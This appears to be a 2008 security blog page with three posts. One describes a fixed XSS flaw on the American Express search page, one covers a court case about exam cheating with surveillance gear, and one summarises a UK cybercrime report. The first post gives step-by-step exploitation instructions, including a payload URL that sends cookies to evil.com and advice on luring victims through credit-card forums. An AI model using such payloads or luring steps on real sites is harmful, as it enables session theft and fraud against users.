A Quick Amex XSS

Here is a quick description of a cross-site script exploit that was fixed today on the American Express website.

The vulnerability was in the search engine of the site, which didn’t sanitized the input keywords. Therefore anyone could insert JavaScript into the search and use this to trick people into sending their cookies to the attacker.

All you need to do is

1)      Setup a web server or register for a free web hosting service that supports any type of server-side script (Perl, PHP, ASP etc…)

2)      Create a script to save the stolen cookies into a file or database and put it online.

3)      Get the link of the malicious search link. The code snipplet needed to cause the search to inject JavaScript is:

Where XXX is your code that does what ever you want it to do. If you want to steal the cookie, it code would then be something like:

So the link to use to lure people into sending their cookies would be something like:

http://find.americanexpress.com/search?q=%22%3E%3Cscript%3Elocation.href=’http://evil.com/cookie.php?’%2Bdocument.cookie%3C/script%3E

4)      Place this link into forums about American Express or credit cards (since there is a better chance that people using these forums are using the Amex website, and therefore have cookies…)

Now this XSS have been fixed after it started to go public. This folk[1], who found the bug, had a particular hard time convincing Amex about this security problem.

A video of the simple exploit is available  at :http://holisticinfosec.org/video/online_finance/amex.html

See also:

American Express web bug exposes card holders“, Dan Goodin, The Register, December 16, 2008, http://www.theregister.co.uk/2008/12/16/american_express_website_bug/ (accessed on December 17, 2008)


[1] “Holistic Security”, Russ McRee, December 17, 2008 http://holisticinfosec.blogspot.com/2008/12/online-finance-flaw-american-express.html (accessed on December 17, 2008)

High-tech Cheating

One man and a woman, Steve Lee and Rong Yang, were convicted last week to eight months of prison after helping two Chinese men cheat their immigration exams, according to a news report from the Metropolitan Police Service[1].  The duo was monitoring the examination from a vehicle outside the building with laptops, transmitters and other equipment.

“Lee and Yang were clearly involved in a sophisticated operation using some of the best surveillance technology available worth thousands of pounds. When we first arrived at the scene it was very confusing as to what exactly was going on.”

It’s hard to tell what was the “best surveillance technology available worth thousands of pounds” since no detailed equipment list was given, but we might expect this to be largely exaggerated. The report states that Zhuang, the examinee, was given “tiny buttonhole cameras sewn in, a microphone and a small ear piece”. With this equipment, the information was transmitted back to Lee and Yang, who told Zhuang the answers to the questions.

“Best surveillance equipment” found into the car
“Best surveillance equipment” found into the car

I decided to look the equipment needed to conduct such an operation. The following material can be found without looking very hard on the net:

· Wireless Button Camera – £226.37

· Wireless Microphone – £133.13

· Wireless Earpiece – £134

· Laptop – £429

· Wireless Router – £51

Total: £973.5

Unless I’m forgetting something worth more than £1000, this is far from being “thousands of pounds”. And I’m quite sure you can get these items cheaper if you look on eBay.

Anyway, the cheaters were caught after a member of the public reported seeing them sitting Lee and Yang in a silver BMW with wires running from under the hood to the inside the car.

According to Sergeant Dominic Washington who first responded to the call from the public, said:

“However, working with colleagues from across the borough and the Met we believe that we have uncovered an established criminal enterprise that may be in operation in other parts of the country.”

No, I don’t think so… but this might give ideas to the others. And why were there wires under the car?


[1] “Two convicted for immigration test scam”, Metropolitan Police Service, November 14, 2008, http://cms.met.police.uk/news/convictions/two_convicted_for_immigration_test_scam (accessed on November 17, 2008)

Cybercrime Rose by 9% in Britain

The BBC reports that cybercrime rose by 9% in Britain[1]. This is according to Online Identity firm Garlik which release its 2008 Cybercrime Report. The report contains interesting statistics. Among others, identity theft drop from 92 000 offenses in 2006 to 84 700, a 8% drop[2]. Financial fraud rose by 24% and is expected to increase for 2008-2009, mainly due to the financial crisis going on. The report cites the leaked letter from the Home Office indicating a possible rise in crime[3]. This is really no surprise.

Always according to the report, the top three stolen documents for identity theft were non-UK passports, utility bills and UK passports[4]. As for financial cybercrimes, losses from UK victims amounted to £535million (1 billion $CAN, 869 millions $US), up 25% from 2006. The reports further states this interesting bit of information:

“… personal details and identity information are traded online with the 15 Research conducted by Garlik’s team of researchers investigating the presence of illegal trading networks on the Internet, number of trading networks more than doubling (from 27 to 57) over the past nine months. In a typical day, around 520 individual information traders are identified with 19,217 traders being identified this year. Of these, around 700 are ‘long term’ traders …[5]

Cybercrime in the UK rose by more than 9% in 2007
Cybercrime in the UK rose by more than 9% in 2007

That’s 57 trading network and around 20 000 traders, which, at least for me, is a big number. But the report doesn’t specify how those traders were identified though. The 700 “long-term” traders are seemed to be identified only with their online alias. Therefore if the “20 000 traders” is counted using aliases, this number might be higher than the actual number of traders.

The reports do not goes into great details on how the criminals get the information, but it does mention Trojans, phishing and SQL injections as a way to retrieve the information. As for the damage caused by these for UK companies, 830 000 companies report a computer-related incident last year. Viruses accounted for 21% of those incidents and are on the decline.

Fortunately, the report also mention lack of data protection from the government but fail to give any number, since it’s outside the scope of the document. But shouldn’t it be considered so? Shouldn’t this be considered as criminal negligence? After all, lost data impact lives and can lead to disaster for the victims of this negligence…

Garlik also describe interesting statistics about online harassment. The complete report can be found here: http://www.garlik.com/static_pdfs/cybercrime_report_2008.pdf


[1] “Cybercrime wave sweeping Britain”, BBC News, October 30, 2008,  http://news.bbc.co.uk/2/hi/technology/7697704.stm (accessed October 30, 2008)

[2] “UK Cybercrime Report 2008”, Stefan Fafinski, Neshan Minassian, Garlik, September 2008, p. 5

[3] “Leaked letter predicts crime rise”, BBC News, September 1, 2008,  http://news.bbc.co.uk/2/hi/uk_news/politics/7591072.stm (accessed on October 30, 2008)

[4] “UK Cybercrime Report 2008”, Stefan Fafinski, Neshan Minassian, Garlik, September 2008, p. 12

[5] Idem, p. 16